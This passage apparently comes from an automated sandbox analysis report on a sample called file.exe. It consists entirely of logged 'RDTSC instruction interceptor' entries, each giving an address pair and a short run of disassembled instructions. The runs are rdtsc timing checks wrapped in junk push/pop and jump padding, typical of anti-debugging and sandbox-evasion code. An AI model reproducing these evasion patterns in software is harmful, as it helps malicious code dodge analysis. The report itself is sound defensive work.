Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FD504B second address: FD507B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAACBEF8D1h 0x00000007 jmp 00007FFAACBEF8D8h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FD5AD0 second address: FD5AD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FD86B0 second address: FD86D8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAACBEF8D8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jno 00007FFAACBEF8CCh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FD882A second address: FD883A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFAAD0A8F1Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FD883A second address: FD883E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FD8C22 second address: FD8C31 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAAD0A8F1Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FDF7BC second address: FDF7C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FDF7C3 second address: FDF7D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFAAD0A8F1Bh 0x00000009 pop edi 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FDF7D6 second address: FDF7F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFAACBEF8D2h 0x00000009 push eax 0x0000000a pop eax 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 push eax 0x00000011 pop eax 0x00000012 pop ecx 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FDF7F9 second address: FDF7FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FDF7FF second address: FDF804 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FE035A second address: FE0360 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FE0360 second address: FE0377 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FFAACBEF8CAh 0x0000000a push eax 0x0000000b push edx 0x0000000c jo 00007FFAACBEF8C6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FE0924 second address: FE092A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FE092A second address: FE0936 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push edx 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FE0C0E second address: FE0C30 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007FFAAD0A8F26h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ecx 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FE452A second address: FE4537 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FFAACBEF8C6h 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FE4537 second address: FE453D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FE453D second address: FE4579 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FFAACBEF8C6h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d jmp 00007FFAACBEF8D0h 0x00000012 jnc 00007FFAACBEF8CCh 0x00000018 popad 0x00000019 jno 00007FFAACBEF8EDh 0x0000001f jno 00007FFAACBEF8C8h 0x00000025 push ebx 0x00000026 pop ebx 0x00000027 push eax 0x00000028 push edx 0x00000029 push esi 0x0000002a pop esi 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FE4886 second address: FE4892 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FFAAD0A8F1Eh 0x00000008 push esi 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FE49DA second address: FE49DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FE49DE second address: FE49E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FE49E9 second address: FE49EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FE49EE second address: FE49F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FE49F4 second address: FE49FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FE49FA second address: FE49FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FE49FE second address: FE4A04 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FE4A04 second address: FE4A3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FFAAD0A8F23h 0x0000000c jmp 00007FFAAD0A8F23h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 pushad 0x00000017 js 00007FFAAD0A8F1Ch 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FE4A3F second address: FE4A65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 jmp 00007FFAACBEF8D7h 0x0000000c jo 00007FFAACBEF8C6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FE4A65 second address: FE4A74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 jbe 00007FFAAD0A8F16h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FE5013 second address: FE5019 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FEA009 second address: FEA017 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FEA017 second address: FEA01B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FEA01B second address: FEA01F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FEA01F second address: FEA025 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FEA025 second address: FEA02B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FEA02B second address: FEA049 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAACBEF8D9h 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF0ECA second address: FF0EE9 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 je 00007FFAAD0A8F16h 0x00000009 push edx 0x0000000a pop edx 0x0000000b pop esi 0x0000000c pushad 0x0000000d jmp 00007FFAAD0A8F20h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF0EE9 second address: FF0EEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF0EEF second address: FF0EF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF11B9 second address: FF11BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF11BF second address: FF11C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 push edx 0x00000007 pop edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF11C9 second address: FF11CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF11CF second address: FF11D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF11D4 second address: FF11DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF11DA second address: FF11DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF11DE second address: FF11EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF11EA second address: FF11EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF12FD second address: FF1303 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF1303 second address: FF1322 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 pushad 0x00000008 push edx 0x00000009 pop edx 0x0000000a jmp 00007FFAAD0A8F21h 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF161A second address: FF1644 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAACBEF8CDh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push esi 0x0000000d pop esi 0x0000000e jg 00007FFAACBEF8C6h 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FFAACBEF8CBh 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF1A3E second address: FF1A50 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007FFAAD0A8F1Ch 0x0000000c js 00007FFAAD0A8F16h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF2980 second address: FF298F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 js 00007FFAACBEF8C8h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF298F second address: FF2995 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF2995 second address: FF2999 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF2999 second address: FF29B1 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FFAAD0A8F16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jbe 00007FFAAD0A8F16h 0x00000012 jno 00007FFAAD0A8F16h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FF29B1 second address: FF29B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FFAAF3 second address: FFAAF9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FFAAF9 second address: FFAAFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FFA4E8 second address: FFA509 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFAAD0A8F26h 0x00000009 jl 00007FFAAD0A8F16h 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FFA67B second address: FFA68C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAACBEF8CBh 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FFA68C second address: FFA696 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007FFAAD0A8F16h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FFA696 second address: FFA69A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FFA7BC second address: FFA7C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FFA7C2 second address: FFA7DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007FFAACBEF8D7h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FFA7DE second address: FFA7FF instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007FFAAD0A8F23h 0x00000008 pushad 0x00000009 popad 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d je 00007FFAAD0A8F16h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10064DD second address: 10064E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push edx 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 pop edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10064E6 second address: 10064F8 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FFAAD0A8F1Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10064F8 second address: 10064FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 100632D second address: 1006355 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FFAAD0A8F29h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jnp 00007FFAAD0A8F16h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1006355 second address: 1006359 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10090CF second address: 10090D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10090D5 second address: 10090D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10090D9 second address: 10090E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jl 00007FFAAD0A8F16h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10090E7 second address: 10090F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007FFAACBEF8C8h 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 push edx 0x00000011 pop edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 100B3DB second address: 100B3ED instructions: 0x00000000 rdtsc 0x00000002 js 00007FFAAD0A8F16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jng 00007FFAAD0A8F1Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 100F41E second address: 100F43B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007FFAACBEF8D7h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 100F43B second address: 100F456 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FFAAD0A8F1Eh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d jc 00007FFAAD0A8F16h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 100F456 second address: 100F45A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10144F1 second address: 10144F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10144F5 second address: 10144F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 101BDC3 second address: 101BDC7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1024F18 second address: 1024F1E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1024F1E second address: 1024F24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1024F24 second address: 1024F28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1023AD5 second address: 1023ADA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1023ADA second address: 1023ADF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1023C38 second address: 1023C3E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1023C3E second address: 1023C52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFAACBEF8D0h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1023C52 second address: 1023C6A instructions: 0x00000000 rdtsc 0x00000002 jne 00007FFAAD0A8F16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jno 00007FFAAD0A8F16h 0x00000016 push edx 0x00000017 pop edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1023C6A second address: 1023C9D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAACBEF8D4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a jmp 00007FFAACBEF8D7h 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 pop edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F39338 second address: F3934B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FFAAD0A8F1Ch 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F3934B second address: F3934F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1027A28 second address: 1027A2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 102CF36 second address: 102CF3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 103A8B0 second address: 103A8CD instructions: 0x00000000 rdtsc 0x00000002 jc 00007FFAAD0A8F16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FFAAD0A8F23h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 103A8CD second address: 103A8D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1061102 second address: 1061108 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1061108 second address: 106110D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 106110D second address: 106112A instructions: 0x00000000 rdtsc 0x00000002 js 00007FFAAD0A8F2Fh 0x00000008 jmp 00007FFAAD0A8F23h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 106112A second address: 1061131 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1061244 second address: 106124A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 106124A second address: 106124E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 106124E second address: 1061267 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FFAAD0A8F16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jbe 00007FFAAD0A8F18h 0x00000010 pop esi 0x00000011 pushad 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
